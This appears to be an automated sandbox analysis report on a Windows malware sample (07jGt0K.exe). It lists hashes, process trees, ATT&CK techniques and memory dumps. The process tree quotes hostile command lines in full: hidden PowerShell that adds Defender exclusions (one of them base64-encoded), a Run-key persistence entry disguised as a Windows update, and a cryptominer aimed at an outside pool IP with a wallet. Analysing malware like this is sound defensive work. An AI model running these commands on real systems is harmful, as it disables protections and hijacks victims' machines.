b7a2def2630cbbca20d06f0d40ceaf00f8df471adb12f62efbeb513681cf4878

Analysis

max time kernel
146s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
15/04/2025, 23:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

quarantine/07jGt0K.exe
Size

2.2MB
MD5

a9187bdd14994263a71df6391de8f2ec
SHA1

0dae6efc0a232f1eadbc9752f063ff2198658905
SHA256

ae3c79e6c2bdf029bb05fdd16b5279b6e47c782beee25bf89657e1e1382a8226
SHA512

1ba13176891feadf2fa5e0d60b9aa581270b56cafcfb2ad0d3a9d4a8ae27cb9d725ce3d0cf21d3a5bc69ca683d1c9577eb96ac454d41563a6fac49090bbfa8db
SSDEEP

49152:VHHiXaFbnwwQkcU4KtU6hBKiJvGnoLJGps6KxLJFWDvR+ACha:5OaFbnwvFKa09J+EJGps6oLmkAp

Score

10^/10

execution persistence

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1672 created 3476	1672	000003190029.exe	56

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4124	powershell.exe
1264	powershell.exe
1264	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
1520	000003190029.exe
5924	000003190029.exe
1672	000003190029.exe
5760	000003190029.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdateService = "C:\\Users\\Admin\\Documents\\App\\000003190029.exe"	07jGt0K.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1520 set thread context of 1672	1520	000003190029.exe	99
PID 5924 set thread context of 5760	5924	000003190029.exe	100
PID 1672 set thread context of 4564	1672	000003190029.exe	106

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1264	powershell.exe
1264	powershell.exe
5812	07jGt0K.exe
5812	07jGt0K.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
4124	powershell.exe
4124	powershell.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe
1672	000003190029.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	5924	000003190029.exe
Token: SeDebugPrivilege	1520	000003190029.exe
Token: SeDebugPrivilege	1520	000003190029.exe
Token: SeDebugPrivilege	5924	000003190029.exe
Token: SeDebugPrivilege	1672	000003190029.exe
Token: SeDebugPrivilege	4124	powershell.exe
Token: SeLockMemoryPrivilege	4564	AddInProcess.exe
Token: SeLockMemoryPrivilege	4564	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4564	AddInProcess.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 5812 wrote to memory of 1264	5812	07jGt0K.exe	87
PID 5812 wrote to memory of 1264	5812	07jGt0K.exe	87
PID 5812 wrote to memory of 1520	5812	07jGt0K.exe	96
PID 5812 wrote to memory of 1520	5812	07jGt0K.exe	96
PID 3020 wrote to memory of 5924	3020	cmd.exe	98
PID 3020 wrote to memory of 5924	3020	cmd.exe	98
PID 1520 wrote to memory of 1672	1520	000003190029.exe	99
PID 1520 wrote to memory of 1672	1520	000003190029.exe	99
PID 1520 wrote to memory of 1672	1520	000003190029.exe	99
PID 1520 wrote to memory of 1672	1520	000003190029.exe	99
PID 1520 wrote to memory of 1672	1520	000003190029.exe	99
PID 1520 wrote to memory of 1672	1520	000003190029.exe	99
PID 5924 wrote to memory of 5760	5924	000003190029.exe	100
PID 5924 wrote to memory of 5760	5924	000003190029.exe	100
PID 5924 wrote to memory of 5760	5924	000003190029.exe	100
PID 5924 wrote to memory of 5760	5924	000003190029.exe	100
PID 5924 wrote to memory of 5760	5924	000003190029.exe	100
PID 5924 wrote to memory of 5760	5924	000003190029.exe	100
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106
PID 1672 wrote to memory of 4564	1672	000003190029.exe	106

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3476
- C:\Users\Admin\AppData\Local\Temp\quarantine\07jGt0K.exe
  "C:\Users\Admin\AppData\Local\Temp\quarantine\07jGt0K.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:5812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents\App'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1264
- - C:\Users\Admin\Documents\App\000003190029.exe
    "C:\Users\Admin\Documents\App\000003190029.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Users\Admin\Documents\App\000003190029.exe
      "C:\Users\Admin\Documents\App\000003190029.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\App\000003190029.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Users\Admin\Documents\App\000003190029.exe
    C:\Users\Admin\Documents\App\000003190029.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5924
  - - C:\Users\Admin\Documents\App\000003190029.exe
      "C:\Users\Admin\Documents\App\000003190029.exe"
      4⤵
      Executes dropped EXE
      PID:5760
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 196.251.81.64:49301 -u 46hYgPSSLZTjmkoYx994198Gus57VJiWtBEiz4dk8qFwDtz4Hi1ZUg2RXomML4NY5PThMidbL5MnAecu8VAHuz51HvkMFWw.jogpreet -p x --cpu-max-threads-hint=50 -k
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAGQALQBtAHAAUAByAGUAZgBFAFIAZQBuAEMARQAgAC0ARQBYAEMAbABVAFMAaQBvAE4AUAByAE8AQwBlAFMAcwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAGYAbwBSAEMAZQA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4124

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67028cc3db799cacacca978ac55c6180

SHA1
9faaaca4dcfe9ab1e58b9e808ab7836c4e5597cd

SHA256
4475b7101a39e66452bcb4edd9de257298d656d39de50378c4febb4e5459d8e4

SHA512
f6d6a1cd476bac7a8c46691206baa846733198f7ffc4a7e2e66b49bb924a2f41b1060feda0a3b89b0acf1b3e5ce04cd016d2cb263035ab888eaf80a96903cf0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tgpblin5.n04.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Documents\App\000003190029.exe

Filesize
1.7MB

MD5
cd2ebf2d63f95ca0fb60e7210bd0a29e

SHA1
7177910ebeb82395107dc48afe7d394eb8f42383

SHA256
099c5e5b9b443b77ba8dc6e467b97e86a36036c55264abb9405dafdc23ac25ac

SHA512
aee4d4a2cbe911c23d9ff906b05b1cd07ebc1677e07cee1cefa0a656597804ecf39496ac2f54ab3ae29442a7b7d1d0ec2b7f1fc5899d2a4385b4df6c86d15191

Download Submit
memory/1264-0-0x00007FF8DA183000-0x00007FF8DA185000-memory.dmp

Filesize
8KB

Download
memory/1264-1-0x000001E7B68D0000-0x000001E7B68F2000-memory.dmp

Filesize
136KB

Download
memory/1264-11-0x00007FF8DA180000-0x00007FF8DAC41000-memory.dmp

Filesize
10.8MB

Download
memory/1264-12-0x00007FF8DA180000-0x00007FF8DAC41000-memory.dmp

Filesize
10.8MB

Download
memory/1264-15-0x00007FF8DA180000-0x00007FF8DAC41000-memory.dmp

Filesize
10.8MB

Download
memory/1520-55-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-39-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-63-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-77-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-83-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-81-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-79-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-75-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-73-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-71-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-69-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-67-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-65-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-59-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-57-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-53-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-61-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-21-0x00007FF8D9FD0000-0x00007FF8DAA91000-memory.dmp

Filesize
10.8MB

Download
memory/1520-51-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-49-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-47-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-45-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-41-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-22-0x0000016D72960000-0x0000016D72B0A000-memory.dmp

Filesize
1.7MB

Download
memory/1520-37-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-35-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-33-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-29-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-27-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-25-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-24-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-43-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-31-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-87-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-85-0x0000016D72960000-0x0000016D72B05000-memory.dmp

Filesize
1.6MB

Download
memory/1520-2696-0x00007FF8D9FD0000-0x00007FF8DAA91000-memory.dmp

Filesize
10.8MB

Download
memory/1520-2698-0x0000016D72D10000-0x0000016D72E10000-memory.dmp

Filesize
1024KB

Download
memory/1520-2697-0x0000016D72C10000-0x0000016D72D14000-memory.dmp

Filesize
1.0MB

Download
memory/1520-2701-0x0000016D730A0000-0x0000016D730F4000-memory.dmp

Filesize
336KB

Download
memory/1520-2706-0x00007FF8D9FD0000-0x00007FF8DAA91000-memory.dmp

Filesize
10.8MB

Download
memory/1520-20-0x0000016D703A0000-0x0000016D70550000-memory.dmp

Filesize
1.7MB

Download
memory/1672-2707-0x000001A778270000-0x000001A77837C000-memory.dmp

Filesize
1.0MB

Download
memory/1672-8295-0x000001A778520000-0x000001A778576000-memory.dmp

Filesize
344KB

Download
memory/1672-2705-0x0000000000400000-0x00000000004BA000-memory.dmp

Filesize
744KB

Download
memory/1672-8294-0x000001A778380000-0x000001A778388000-memory.dmp

Filesize
32KB

Download
memory/5924-2699-0x0000024618BF0000-0x0000024618C3C000-memory.dmp

Filesize
304KB

Download